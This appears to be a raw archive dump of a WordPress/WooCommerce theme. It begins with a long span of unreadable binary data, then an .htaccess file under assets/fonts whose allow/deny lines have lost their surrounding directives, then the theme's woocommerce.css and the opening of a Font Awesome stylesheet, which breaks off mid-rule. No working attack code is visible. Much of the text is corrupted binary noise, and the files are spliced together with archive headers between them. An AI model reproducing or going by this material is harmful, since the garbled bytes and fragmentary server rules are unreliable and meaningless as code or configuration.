kIaWډsj8w+Λ{qŸq>nwqUW5ڳq.,n<7p4,nV <:B eJ|}x2I⳽^ |_x+[ |_m4|9wn+yssk4Yg9mO~~>~Q_%~KcCQ,ßŃYs<$h`/Qe+@DQ5CTDTDif%Q;EԾHv#iJiJ)uO'Rv_&"O&"|O4{hh1ѢH^LF$Z6om/'M"/%ڗYJs]'nK'=rD"W]DӉb@&5$C CVCлa##J1z#1db|'bBSbR\$%%"#ffL$fgsy+yo'|L,jE,D,DC]wQ(,",󡄚]{*S͍B޳ȹ| v"w.C5hP 9E܉FuE[1cؓh D;]ўhVχoDӣCEt(: :Q LND#ѹR|Et!].=F+MՎwts'uDʢQ07 ~G? EǠ.zR =ًEϦ˶UC%z}{ЇpB/M }~<~:~I~و~m~ˌ~sog 3џџAODTEC1Tń(s.&wLc1)0)I5&HL 1YnbVd}brTl^Kjbw)Sp/PnL"1E3cza,YCv<CǓ9Y"oIvf—OE6~<=2la$x(q!Rz>!ZX~xRJyb>3OEhȮHȔ뗁Nm ZW QB9X}ZmzVЈЈm>gS~.䛨\XLqkCmlk]4`us|Dkl׊Z>V}m[wJ?t$-~llJ?>'q Vxb1z4q[N(, Ho[QH$E% q?I%٫򏈞l齰[X[]<*FqB=?PK!.|assets/fonts/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!G->w assets/css/woocommerce.cssnu[.wc-wrap { padding-top: 40px; } .shop-page { margin-bottom: 40px; } /** product columns */ .products[class*='wc-col'] { display: flex; display: -webkit-flex; align-items: flex-start; flex: 100%; flex-flow: row wrap; width: 100%; } .products > * { flex: 0 0 100%; max-width: 100%; } .product-thumb img { width: 100%; height: auto; } .wc-entry-content ul, .wc-entry-content ol { list-style: none; } .wc-entry-content li:not(:last-child) { margin-bottom: 5px; } .woocommerce .form-row:not(:last-child ) { margin-bottom: 15px; } .shipping-calculator-button { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline dotted; } .shipping-calculator-button:hover { color: var(--g-color) } .woocommerce-form-login .button, .woocommerce-form-register .button, .return-to-shop .button { font-size: 1rem; margin-top: 12px; } .woocommerce-notices-wrapper ul { font-size: var(--rem-small); padding: 15px; list-style: none; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .woocommerce-notices-wrapper ul.woocommerce-error { border-color: #fcac56; } .woocommerce-notices-wrapper { padding-bottom: 20px; } /** mini cart */ .cart-icon { position: relative; display: flex; flex-flow: row nowrap; justify-content: flex-start; } .cart-link { display: flex; align-items: center; } .cart-counter { font-size: 10px; font-style: normal; z-index: 1; display: flex; align-items: center; justify-content: center; width: 16px; height: 16px; margin-top: -2px; margin-right: -5px; margin-left: -8px; text-align: center; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } .nav-mini-cart { min-width: 320px; padding: 25px 20px; } .woocommerce-mini-cart-item, .product_list_widget li { line-height: 1; position: relative; display: block; } .product_list_widget a { display: block; margin-bottom: 7px; } .woocommerce-mini-cart-item { padding-right: 25px; } .woocommerce-mini-cart-item:not(:last-child), .product_list_widget li:not(:last-child) { margin-bottom: 20px; } .woocommerce-mini-cart-item a:not(.remove), td.product-name, .product_list_widget .product-title { font-family: var(--product-family); font-size: var(--rem-mini); font-weight: var(--product-fweight); font-style: var(--product-fstyle); line-height: var(--product-fheight, 1.5); letter-spacing: var(--product-fspace); text-transform: var(--product-transform); } .woocommerce ul.cart_list li img, .woocommerce ul.product_list_widget li img, .woocommerce-page ul.cart_list li img, .woocommerce-page ul.product_list_widget li img { float: left; max-width: 80px; margin-right: 15px; } a.remove { font-size: 0; position: absolute; top: 5px; right: 0; display: block; min-width: 15px; height: 20px; transition: var(--effect); --webkit-transition: var(--effect); } a.remove:hover { color: var(--g-color); } a.remove:before { font-family: 'ruby-icon' !important; font-size: 14px; position: absolute; top: 0; left: 0; display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; content: '\e964'; color: inherit; } .woocommerce-NoticeGroup { margin-bottom: 15px; padding: 10px; border: 1px solid #ff826f50; border-radius: 3px; } .woocommerce-mini-cart-item .quantity { font-size: var(--rem-small); display: block; margin-top: 12px; } .woocommerce .product_list_widget .star-rating, .reviewer { display: block; margin-top: 7px; } .woocommerce-mini-cart__empty-message, .woocommerce-review-link, .reviewer { font-size: var(--rem-mini); opacity: .5; } .woocommerce-mini-cart__total { display: flex; align-items: center; justify-content: space-between; margin-top: 15px; padding-top: 10px; border-top: 3px solid var(--flex-gray-15); } .woocommerce-mini-cart__buttons { display: flex; flex-flow: column nowrap; margin-top: 20px; text-align: center; } .woocommerce-mini-cart__buttons .button { text-transform: uppercase; } .woocommerce-mini-cart__buttons .button:not(.checkout) { margin-bottom: 10px; color: inherit; border: 1px solid var(--flex-gray-15); background-color: transparent; } .woocommerce-mini-cart__buttons .button:not(.checkout):hover { border-color: currentColor; -webkit-box-shadow: none; box-shadow: none; } .woocommerce .button { line-height: 22px; padding: 10px 25px; white-space: normal; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--wc-add-cart-bg, #6ab662); } .woocommerce .button:hover { -webkit-box-shadow: 0 4px 15px var(--wc-add-cart-bg-90, #6ab662e6); box-shadow: 0 4px 15px var(--wc-add-cart-bg-90, #6ab662e6); } /** product */ .product { position: relative; margin-bottom: 30px; } .product-thumb { position: relative; overflow: hidden; border-radius: var(--round-3); } .product-loop-content > * { margin-top: 12px; } .product-loop-content { position: relative; display: block; padding-top: 3px; } .woocommerce-loop-product__title, .product_title { font-family: var(--product-family, inherit); font-size: var(--product-fsize, var(--rem-small)); font-weight: var(--product-fweight, inherit); font-style: var(--product-fstyle, inherit); line-height: 1.5; letter-spacing: var(--product-fspace, inherit); text-transform: var(--product-transform, inherit); } h1.product_title { font-size: var(--h2-fsize); line-height: 1.2; } .price, .total .woocommerce-Price-amount, .quantity, td.product-price, td.product-subtotal, td[data-title='Subtotal'], td[data-title='Total'], td.product-total, td.cart-subtotal, .cart-subtotal td, .woocommerce-MyAccount-content .shop_table .woocommerce-Price-amount, .product_list_widget .woocommerce-Price-amount, .woocommerce-grouped-product-list-item .woocommerce-Price-amount, .price_label .from, .price_label .to { font-family: var(--price-family, var(--h3-family)); font-size: var(--price-fsize, var(--h3-fsize)); font-weight: var(--price-fweight, var(--h3-fweight)); font-style: var(--price-fstyle, var(--h3-fstyle)); letter-spacing: var(--price-fspace, var(--h3-fspace)); text-transform: var(--price-transform, var(--h3-transform)); } .price ins, .product_list_widget ins { text-decoration: none; } .woocommerce-grouped-product-list-item td { vertical-align: middle; } .price > *:not(del), .total .woocommerce-Price-amount, [data-title='Total'], .order-total td { color: var(--wc-price-color, inherit); } .price del { font-size: var(--em-mini); display: block; opacity: .7; } .woocommerce-Price-currencySymbol { font-size: var(--em-mini); vertical-align: top; } .product .price { line-height: 1; display: flex; align-items: flex-end; flex-flow: row wrap; } .single-product .entry-summary .price { font-size: 2.5rem; } .product .price > *:not(:first-child) { padding-left: 3px; } .product .price > *:not(:last-child) { padding-right: 3px; } .woocommerce-grouped-product-list-item__label { font-size: var(--rem-small); } .woocommerce .star-rating { font-family: 'ruby-icon' !important; font-size: 1rem; line-height: 1; position: relative; display: inline-flex; overflow: hidden; width: 5em; height: 1em; color: var(--wc-star-color, #ffc56d); } .woocommerce .star-rating span { position: absolute; top: 0; left: 0; float: left; overflow: hidden; padding-top: 1.5em; } .woocommerce .star-rating span:before { font-size: 1em; position: absolute; top: 0; left: 0; content: '\e951\e951\e951\e951\e951'; } .product-loop-content .button { line-height: 1.2; display: inline-flex; align-items: center; } .woocommerce .star-rating:before { font-size: 1em; position: absolute; top: 0; left: 0; content: '\e94f\e94f\e94f\e94f\e94f'; } .product-top { display: flex; align-items: center; flex: 0 0 100%; width: 100%; } .product-top .star-rating { margin-left: auto; } .product-entry-categories, .product_list_widget del { color: var(--meta-fcolor); } .product-entry-categories > *:not(:last-child) { margin-right: 7px; } .product-entry-categories a, .woocommerce-breadcrumb a, .product_meta a { transition: var(--effect); --webkit-transition: var(--effect); } .product-entry-categories a:hover { color: var(--g-color); } .onsale { font-size: var(--rem-mini); font-weight: bold; font-style: normal; position: absolute; z-index: 10; top: 10px; left: 10px; display: flex; align-items: center; justify-content: center; padding: 7px 12px; white-space: nowrap; color: var(--absolute-white); border-radius: var(--round-5); background: var(--wc-sale-bg, var(--dark-accent)); } .added_to_cart { display: none; } .woocommerce #respond input#submit.loading, .woocommerce .button.loading { opacity: .25 !important; } .button.loading:after { font-family: 'ruby-icon' !important; font-weight: 400; line-height: 1; margin-left: 5px; content: '\e942'; -webkit-animation: spin 2s linear infinite; animation: spin 2s linear infinite; } .button.added:after { font-family: 'ruby-icon' !important; font-weight: 400; line-height: 1; margin-left: 5px; content: '\e960'; } /** shop page */ .woocommerce .woocommerce-ordering, .woocommerce-page .woocommerce-ordering { margin-bottom: 20px; } .woocommerce-pagination .pagination-wrap { margin-top: 0; } .woocommerce .woocommerce-result-count, .woocommerce-page .woocommerce-result-count { padding-top: 15px; } .woocommerce-shop .woocommerce-breadcrumb, .woocommerce-shop .woocommerce-products-header { display: none; } /** wc page header */ .woocommerce-page .page-header { padding-bottom: 10px; text-align: center; background-color: var(--flex-gray-7); } .woocommerce-breadcrumb { margin-bottom: 7px; color: var(--meta-fcolor); } .woocommerce-breadcrumb a { color: var(--body-fcolor); } .woocommerce-breadcrumb a:hover { color: var(--g-color) } .woocommerce.archive .woocommerce-breadcrumb { padding-right: 20px; padding-left: 20px; } table.shop_table { margin-bottom: 0; border-right: 1px solid var(--flex-gray-15); } table.shop_table th, table.shop_table td { padding: 12px; vertical-align: middle; border-right: none; } table.shop_table td.product-quantity input { padding: 7px; } td.product-thumbnail, td.product-quantity { max-width: 80px; } td.product-subtotal { min-width: 100px; } table.cart td:not(.product-name) { text-align: center; } td.product-price, td.product-subtotal, td[data-title='Subtotal'], td.cart-subtotal, .woocommerce-MyAccount-content .shop_table .woocommerce-Price-amount, .price_label .from, .price_label .to { font-size: var(--rem-small); } table.cart .button { background-color: var(--dark-accent); } table.cart .button:hover { -webkit-box-shadow: 0 4px 15px var(--dark-accent-90); box-shadow: 0 4px 15px var(--dark-accent-90); } .woocommerce .cart-collaterals .cart_totals, .woocommerce-page .cart-collaterals .cart_totals { float: none; width: 100%; } .cart-collaterals table.shop_table, .woocommerce-checkout-review-order-table { border: none !important; } .cart-collaterals table.shop_table td, .checkout-col th.product-total, .checkout-col td.product-total, .checkout-col .cart-subtotal td, .checkout-col .shipping td, .checkout-col .order-total td { text-align: right; } td.product-remove a.remove { position: relative; top: auto; height: auto; } input#coupon_code { min-width: 150px; } .woocommerce-page .cart-collaterals { padding: 30px 20px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } .cart-collaterals h2, #order_review_heading { font-size: var(--h3-fsize); margin-bottom: 30px; } .cart-collaterals td[data-title='Subtotal'], td.product-total, .cart-subtotal td { font-size: 1rem; } .order-total { font-size: 1.25rem; border-top: 2px solid currentColor; } .recurring-total.order-total { font-size: 1rem; } .wc-proceed-to-checkout a.checkout-button { font-size: 1rem; display: block; width: 100%; padding: 15px; text-align: center; text-transform: uppercase; } .cross-sells > h2, .up-sells > h2, .related.products > h2 { font-size: var(--h3-fsize); display: block; margin-bottom: 20px; } .cross-sells, .up-sells, .related.products { display: block; padding-top: 20px; } .woocommerce-customer-details { margin-top: 30px; } p.cart-empty { margin-bottom: 20px; text-align: center; color: var(--meta-fcolor) } p.return-to-shop { display: block; text-align: center; } /** checkout page */ .checkout-col.col-right { padding: 30px 20px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } .checkout-col.col-left .col2-set > * { width: 100%; margin-bottom: 20px; } .checkout-col.col-left .col2-set > *:last-child { margin-bottom: 0; } .checkout-col h3 span { font-size: inherit; } #ship-to-different-address { margin-bottom: 10px; } .checkout-col label, .woocommerce-form label { font-size: var(--rem-mini); margin-bottom: 5px; } .woocommerce-checkout-review-order-table .cart_item td { padding: 7px 15px; } .woocommerce-checkout-review-order-table .cart_item:not(:first-of-type) td { border: none; } .woocommerce-checkout-payment, .woocommerce-privacy-policy-text { padding-top: 15px; border-top: 1px solid var(--flex-gray-15); } ul.payment_methods .payment_box p { font-size: var(--rem-mini); line-height: 1.7; color: var(--meta-fcolor); } ul.payment_methods label { font-size: var(--rem-small); font-weight: 700; } .woocommerce-checkout-payment .payment_methods li { margin-bottom: 10px; } .woocommerce-privacy-policy-text * { font-size: var(--rem-mini); line-height: 1.7; } .woocommerce-checkout-payment #place_order { font-size: 1rem; float: none; width: 100%; margin-top: 15px; text-align: center; text-transform: uppercase; } .woocommerce-shipping-methods li { display: flex; align-items: center; flex-flow: row-reverse nowrap; white-space: nowrap; } .woocommerce-shipping-methods label { font-size: var(--meta-fsize); } .woocommerce-form-coupon-toggle, .woocommerce-notices-wrapper .woocommerce-info, .woocommerce-message { font-size: var(--rem-mini); position: relative; margin-bottom: 20px; padding: 12px 20px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .woocommerce-message { display: flex; align-items: center; } .woocommerce-message a { margin-right: 10px; } .woocommerce-form-coupon { overflow: hidden; padding-bottom: 15px; } .showcoupon { transition: var(--effect); text-decoration: underline dotted; --webkit-transition: var(--effect); } .showcoupon:hover { color: var(--g-color); } .woocommerce-form-coupon p { font-size: var(--rem-mini); margin-bottom: 5px; } .woocommerce form .form-row-first, .woocommerce form .form-row-last, .woocommerce-page form .form-row-first, .woocommerce-page form .form-row-last { width: 100%; } /** order received page */ .woocommerce-order-received .page-header { display: none; } .woocommerce-thankyou-order-received { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); width: 100%; margin-top: 40px; margin-bottom: 20px; padding: 30px; text-align: center; letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); color: #8bc34a; border: 2px dashed currentColor; border-radius: var(--round-5); } ul.woocommerce-thankyou-order-details { font-size: var(--rem-small); display: flex; flex-direction: row; justify-content: space-between; box-sizing: border-box; margin-bottom: 40px; padding: 20px 30px; border-radius: var(--round-5); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); } ul.woocommerce-thankyou-order-details li { display: flex; flex-flow: column nowrap; } h2.woocommerce-order-details__title, h2.woocommerce-column__title { font-size: var(--h3-fsize); margin-bottom: 20px; } .woocommerce-table--order-details tfoot th { font-weight: bold; } .woocommerce-cart-form thead th:not(.product-name) { text-align: center; } /** category page */ .woocommerce-products-header { margin-bottom: 10px; padding-right: 20px; padding-left: 20px; } /** single product */ .woocommerce div.quantity { display: inline-block; line-height: 40px; position: relative; width: 80px; height: 40px; padding-right: 30px; padding-left: 30px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .woocommerce input[type='number']::-webkit-inner-spin-button, .woocommerce input[type='number']::-webkit-outer-spin-button { margin: 0; -webkit-appearance: none; } .woocommerce div.quantity .qty { font-family: inherit; font-weight: inherit; line-height: 34px; position: absolute; top: 0; right: 30px; bottom: 0; left: 30px; width: 20px; margin: auto; padding: 5px 0; text-align: center; border: none; background: transparent; } .woocommerce form.cart div.quantity { width: 100px; } .woocommerce form.cart div.quantity .qty { width: 40px; } .quantity-btn { line-height: 1; position: absolute; z-index: 10; top: 0; right: auto; bottom: 0; left: 0; display: block; width: 30px; height: 42px; cursor: pointer; transition: var(--effect); text-align: center; opacity: .7; --webkit-transition: var(--effect); } .quantity-btn:hover { opacity: 1; } .quantity-btn.up { right: 0; left: auto; } .quantity-btn:before { position: absolute; top: 50%; right: auto; bottom: auto; left: 10px; display: block; width: 10px; content: ''; border-top: 1px solid #555; } .quantity-btn.up:after { position: absolute; top: 50%; right: auto; bottom: auto; left: 10px; display: block; width: 10px; content: ''; -moz-transform: rotate(90deg); -ms-transform: rotate(90deg); -o-transform: rotate(90deg); -webkit-transform: rotate(90deg); transform: rotate(90deg); border-top: 1px solid #555; } .quantity-btn:hover:before, .quantity-btn:hover:after { border-color: #000; } /** my account */ .woocommerce-MyAccount-content p { margin-bottom: 1.5em; } .woocommerce-MyAccount-content a, .woocommerce-form a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline solid transparent; color: var(--g-color); } .woocommerce-MyAccount-content a:not(.button):hover, .woocommerce-form a:hover { text-decoration-color: var(--g-color); } .woocommerce-MyAccount-navigation li { margin-bottom: 15px !important; } .woocommerce-MyAccount-navigation ul { margin-right: 40px; padding: 30px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .woocommerce-MyAccount-navigation a { -webkit-transition: var(--effect); transition: var(--effect); } .product_meta { font-size: var(--meta-fsize); display: flex; flex-flow: column nowrap; } .product_meta .sku, .product_meta a { color: var(--body-fcolor); } .woocommerce-MyAccount-navigation a:hover, .product_meta a:hover { color: var(--g-color); } .woocommerce-MyAccount-content [data-title='Total'] { font-size: inherit; color: inherit; } .woocommerce-MyAccount-content [data-title='Date'], .woocommerce-MyAccount-content [data-title='Status'], .woocommerce-LostPassword, .cart-collaterals table, .checkout-col.col-left span, .woocommerce-tabs table, .woocommerce-Reviews .star-rating, strong.woocommerce-review__author { font-size: var(--rem-mini); } .woocommerce-EditAccountForm label, .product_list_widget .product-title, .product_list_widget .woocommerce-Price-amount { font-size: var(--rem-small); } .woocommerce-account h2, .woocommerce-account h3 { font-size: 1rem; margin-bottom: 15px; padding-bottom: 15px; text-transform: uppercase; border-bottom: 2px solid var(--flex-gray-15); } .woocommerce form .show-password-input, .woocommerce-page form .show-password-input { display: none; } /** single product */ .wc-tabs { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); display: flex; flex-flow: row nowrap; margin-bottom: 15px; padding-bottom: 15px; letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); border-bottom: 1px solid var(--flex-gray-15); } .wc-tabs li { margin-right: 15px; opacity: .5; } .wc-tabs li.active, .wc-tabs li:hover { opacity: 1; } p.stars span { display: flex; flex-flow: row wrap; } p.stars a { font-family: 'ruby-icon' !important; font-size: 0; line-height: 1; position: relative; display: inline-block; margin-right: 5px; padding-right: 5px; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; border-right: 1px solid var(--flex-gray-15); } p.stars a:hover, p.stars a.active { color: var(--wc-star-color, #ffc56d) !important; } p.stars a:before { font-size: var(--rem-small); position: relative; content: '\e94f'; text-indent: 0; } p.stars a:hover:before { content: '\e951'; } p.stars a.star-2:before { content: '\e94f\e94f'; } p.stars a.star-2.active:before, p.stars a.star-2:hover:before { content: '\e951\e951'; } p.stars a.star-3:before { content: '\e94f\e94f\e94f'; } p.stars a.star-3.active:before, p.stars a.star-3:hover:before { content: '\e951\e951\e951'; } p.stars .star-4:before { content: '\e94f\e94f\e94f\e94f'; } p.stars a.star-4.active:before, p.stars a.star-4:hover:before { content: '\e951\e951\e951\e951'; } p.stars a.star-5:before { content: '\e94f\e94f\e94f\e94f\e94f'; } p.stars a.star-5.active:before, p.stars a.star-5:hover:before { content: '\e951\e951\e951\e951\e951'; } .woocommerce-Reviews { font-size: var(--rem-small); } .woocommerce-Reviews ol.commentlist { margin-bottom: 20px; padding: 0; list-style: none; } .woocommerce-Reviews .comment_container { display: inline-flex; margin-top: 15px; margin-bottom: 15px; } .woocommerce-Reviews .avatar { width: 60px; height: 60px; margin-top: 0; margin-right: 15px; border-radius: 50%; } .woocommerce-Reviews .comment-text { width: 90%; } time.woocommerce-review__published-date { font-size: var(--rem-mini); text-decoration: none; color: var(--meta-fcolor); } .woocommerce-Reviews label { display: inline-block; margin-bottom: 7px; } h2.woocommerce-Reviews-title { font-size: 1.2rem; margin-bottom: 5px; } .woocommerce-Reviews span#reply-title { font-size: 1rem; display: block; margin-bottom: 30px; padding-bottom: 15px; border-bottom: 1px solid var(--flex-gray-15); } .woocommerce-noreviews { width: auto; margin-top: 20px; margin-bottom: 20px; padding: 10px; border-radius: var(--round-5); background: var(--flex-gray-7); } /** single product image */ .single-product .wc-wrap { padding-right: 20px; padding-left: 20px; } .single_variation_wrap > *:not(:last-child) { margin-bottom: 15px; } .woocommerce .flex-control-thumbs { display: flex; flex-flow: row nowrap; margin-top: 5px; } .woocommerce .flex-control-thumbs li { position: relative; display: block; overflow: hidden; width: 18%; height: 0; margin-right: 5px; padding-bottom: 18%; cursor: pointer; border: 1px solid var(--flex-gray-15); } .woocommerce .flex-control-thumbs img { position: absolute; display: block; width: 100%; height: 100%; padding: 5px; object-fit: cover; } .woocommerce-tabs { padding-top: 40px; } .product_meta > *:not(:last-child) { margin-bottom: 10px; } .single-product .cart { display: flex; flex-flow: row nowrap; } .single-product .cart.grouped_form, .single-product .cart.variations_form { flex-flow: column nowrap; } .single-product .cart .button { font-size: 1rem; margin-left: 15px; white-space: nowrap; } .single-product .variations_form .button { margin-top: 15px; margin-left: 0; } .single-product .variations_form select { width: 100%; } .single-product .entry-summary > *:not(:last-child) { margin-bottom: 25px; } .reset_variations { font-size: var(--rem-small); float: right; padding-top: 4px; color: #ff6d6d; } .woocommerce-product-rating { display: flex; align-items: center; flex-flow: row wrap; } .widget_price_filter .ui-widget-content { border: 0; border-radius: var(--round-5); background: var(--flex-gray-15); } .widget_price_filter .ui-slider-horizontal { height: 2px;; } .widget_price_filter .ui-slider { position: relative; text-align: left; } .widget_price_filter .price_slider { margin-bottom: 20px; } .widget_price_filter .ui-slider-horizontal .ui-slider-range { top: 0; height: 100%; } .widget_price_filter .ui-slider .ui-slider-range { font-size: .7em; position: absolute; z-index: 1; display: block; border-radius: var(--round-5); background-color: var(--dark-accent); } .widget_price_filter .ui-slider .ui-slider-handle { position: absolute; z-index: 2; top: auto; box-sizing: border-box; width: 15px; height: 15px; margin-top: -6px; margin-left: auto; cursor: ew-resize; opacity: 1; border: 3px solid var(--dark-accent); border-radius: 100%; background-color: #fff; } .widget_price_filter .ui-slider .ui-slider-handle { position: absolute; z-index: 2; top: auto; box-sizing: border-box; width: 15px; height: 15px; margin-top: -6px; margin-left: auto; cursor: ew-resize; opacity: 1; border: 3px solid var(--dark-accent); border-radius: 100%; background-color: #fff; } .widget_price_filter .ui-slider .ui-slider-handle:last-child { margin-left: -5px; } .widget_price_filter .button { width: 100%; margin-top: 15px; } .price_slider_amount { display: flex; flex-flow: column-reverse nowrap; } @media (min-width: 1025px) { .shop-page:not(.without-sidebar) .grid-container > *:nth-child(1) { flex: 0 0 70%; width: 70%; } .woocommerce-shop .grid-container > *:nth-child(2) { flex: 0 0 30%; width: 30%; } .wc-wrap { padding-top: 50px; } .shop-page { margin-bottom: 50px; } .product-loop-content { padding-bottom: 15px; } .product-loop-content > .button { margin-top: 0; } .product-loop-content .button { position: absolute; z-index: 10; top: 100%; margin-top: 0; padding-top: 12px; opacity: 0; } .products .product:before { position: absolute; top: -15px; right: 0; left: 0; display: block; height: calc(100% + 15px); content: ''; -webkit-transition: var(--effect); transition: var(--effect); pointer-events: none; opacity: 0; border: 1px solid transparent; border-radius: var(--round-3); background-color: var(--solid-white); -webkit-box-shadow: 0 5px 30px var(--shadow-12); box-shadow: 0 5px 30px var(--shadow-12); backface-visibility: hidden; } .products > .product:hover { z-index: 100; } .products > .product:hover .button { opacity: 1; } .products > .product:hover:before { height: calc(100% + 75px); opacity: 1; } [data-theme='dark'] .product:hover:before { background-color: var(--dark-accent); } /** cart page */ .woocommerce-page .woocommerce-cart-form, .woocommerce-page .cart-collaterals { display: block; float: left; } .woocommerce-page .woocommerce-cart-form { width: 66.7%; padding-right: 60px; } .woocommerce-page .cart-collaterals { width: 33%; padding-bottom: 50px; } .woocommerce-page .cross-sells { clear: both; width: 100%; } /** checkout */ .checkout-col { display: block; float: left; } .checkout-col.col-left { width: 65%; padding-right: 60px; } .checkout-col.col-right { width: 35%; padding-bottom: 50px; } .cross-sells, .up-sells, .related.products { padding-top: 30px; } .woocommerce-page .page-header { padding-bottom: 20px; } .woocommerce-tabs { padding-top: 50px; padding-bottom: 20px; } .woocommerce-products-header { margin-bottom: 10px; } .wc-tabs li { margin-right: 25px; } } @media (min-width: 768px) { .wc-col-2 > * { flex: 0 0 50%; max-width: 50%; } .wc-col-3 > * { flex: 0 0 33.333%; max-width: 33.333%; } .wc-col-4 > * { flex: 0 0 25%; max-width: 25%; } .wc-col-5 > * { flex: 0 0 20%; max-width: 20%; } .wc-col-6 > * { flex: 0 0 16.66%; max-width: 16.66%; } .wc-col-7 > * { flex: 0 0 14.28%; max-width: 14.28%; } ul.woocommerce-thankyou-order-details li { margin-bottom: 0 !important; } } @media (max-width: 1024px) and (min-width: 768px) { [class*='tablet-columns-'] .products { justify-content: center; } .tablet-columns-2 .products > * { flex: 0 0 50%; max-width: 50%; } .tablet-columns-3 .products > * { flex: 0 0 33.333%; max-width: 33.333%; } .tablet-columns-4 .products > * { flex: 0 0 25%; max-width: 25%; } .tablet-columns-5 .products > * { flex: 0 0 20%; max-width: 20%; } .tablet-columns-6 .products > * { flex: 0 0 16.66%; max-width: 16.66%; } .tablet-columns-7 .products > * { flex: 0 0 14.28%; max-width: 14.28%; } } @media (max-width: 767px) { ul.woocommerce-thankyou-order-details { flex-flow: column nowrap; } .woocommerce-column--2, .woocommerce-MyAccount-content, .woocommerce .col2-set .col-2, .woocommerce-page .col2-set .col-2 { margin-top: 40px; } .woocommerce-MyAccount-navigation ul { margin-right: 0; } .single-product .entry-summary { margin-top: 20px; } .single-product .entry-summary > *:not(:last-child) { margin-bottom: 20px; } .mobile-columns-2 .products > * { flex: 0 0 50%; max-width: 50%; } .mobile-columns-2 .products-outer.gutter-n15 { margin-right: -10px; margin-left: -10px; } .mobile-columns-2 .product.gutter-p15 { padding-right: 10px; padding-left: 10px; } .mobile-columns-2 .products .button { padding: 7px 15px; } .woocommerce-page table.cart td.product-thumbnail, .woocommerce-page table.cart td.product-quantity { max-width: 100%; } .woocommerce-page table.cart .product-thumbnail:before { display: none; } .woocommerce-page table.cart .product-thumbnail { display: block; } .woocommerce-page table.cart td.product-thumbnail img { display: block; margin-left: 0; width: 120px; max-width: 120px; } .woocommerce-page table.cart td.product-remove { position: absolute; z-index: 10; top: 0; right: 0; background-color: var(--flex-gray-15); } .checkout-col.col-right { margin-top: 30px; } .woocommerce-thankyou-order-received { padding: 20px; } }PK!_7-WWassets/css/font-awesome.cssnu[/*! * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */ .fa { font-family: var(--fa-style-family, "Font Awesome 6 Free"); font-weight: var(--fa-style, 900); } .fa, .fas, .fa-solid, .far, .fa-regular, .fal, .fa-light, .fat, .fa-thin, .fad, .fa-duotone, .fab, .fa-brands { font-style: normal; font-variant: normal; line-height: 1; display: var(--fa-display, inline-block); -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; text-rendering: auto; } .fa-1x { font-size: 1em; } .fa-2x { font-size: 2em; } .fa-3x { font-size: 3em; } .fa-4x { font-size: 4em; } .fa-5x { font-size: 5em; } .fa-6x { font-size: 6em; } .fa-7x { font-size: 7em; } .fa-8x { font-size: 8em; } .fa-9x { font-size: 9em; } .fa-10x { font-size: 10em; } .fa-2xs { font-size: 0.625em; line-height: 0.1em; vertical-align: 0.225em; } .fa-xs { font-size: 0.75em; line-height: 0.08333em; vertical-align: 0.125em; } .fa-sm { font-size: 0.875em; line-height: 0.07143em; vertical-align: 0.05357em; } .fa-lg { font-size: 1.25em; line-height: 0.05em; vertical-align: -0.075em; } .fa-xl { font-size: 1.5em; line-height: 0.04167em; vertical-align: -0.125em; } .fa-2xl { font-size: 2em; line-height: 0.03125em; vertical-align: -0.1875em; } .fa-fw { width: 1.25em; text-align: center; } .fa-ul { margin-left: var(--fa-li-margin, 2.5em); padding-left: 0; list-style-type: none; } .fa-ul > li { position: relative; } .fa-li { line-height: inherit; position: absolute; left: calc(var(--fa-li-width, 2em) * -1); width: var(--fa-li-width, 2em); text-align: center; } .fa-border { padding: var(--fa-border-padding, 0.2em 0.25em 0.15em); border-width: var(--fa-border-width, 0.08em); border-style: var(--fa-border-style, solid); border-color: var(--fa-border-color, #eee); border-radius: var(--fa-border-radius, 0.1em); } .fa-pull-left { float: left; margin-right: var(--fa-pull-margin, 0.3em); } .fa-pull-right { float: right; margin-left: var(--fa-pull-margin, 0.3em); } .fa-beat { -webkit-animation-name: fa-beat; animation-name: fa-beat; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out); animation-timing-function: var(--fa-animation-timing, ease-in-out); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-bounce { -webkit-animation-name: fa-bounce; animation-name: fa-bounce; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1)); animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1)); -webkit-animation-delay: 